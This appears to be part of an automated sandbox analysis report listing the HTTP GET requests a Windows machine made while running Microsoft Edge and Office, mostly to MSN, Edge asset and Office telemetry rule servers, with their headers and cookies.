                      Source: global trafficHTTP traffic detected: GET /b?rn=1732700967945&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=39EBC277A9596CA639AAD733A8706D90&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=39EBC277A9596CA639AAD733A8706D90&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-2063246587742936609&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=a8816b0182bf47eda22b4ccd7fd1d531 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /b2?rn=1732700967945&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=39EBC277A9596CA639AAD733A8706D90&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1BBb0735b69c9f65be6a9b11732694808; XID=1BBb0735b69c9f65be6a9b11732694808
                      Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1732700967945&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=3717764927f647ecb68b34236b867e95&activityId=3717764927f647ecb68b34236b867e95&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=47F7869059534BA19110C6BE745DBB28&MUID=39EBC277A9596CA639AAD733A8706D90 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1; SM=T
                      Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=39EBC277A9596CA639AAD733A8706D90&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-2063246587742936609&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=28783dc8111142cab929e8081cdb035f HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1; _C_ETH=1; msnup=
                      Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msIAw.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msOP1.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msFQA.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
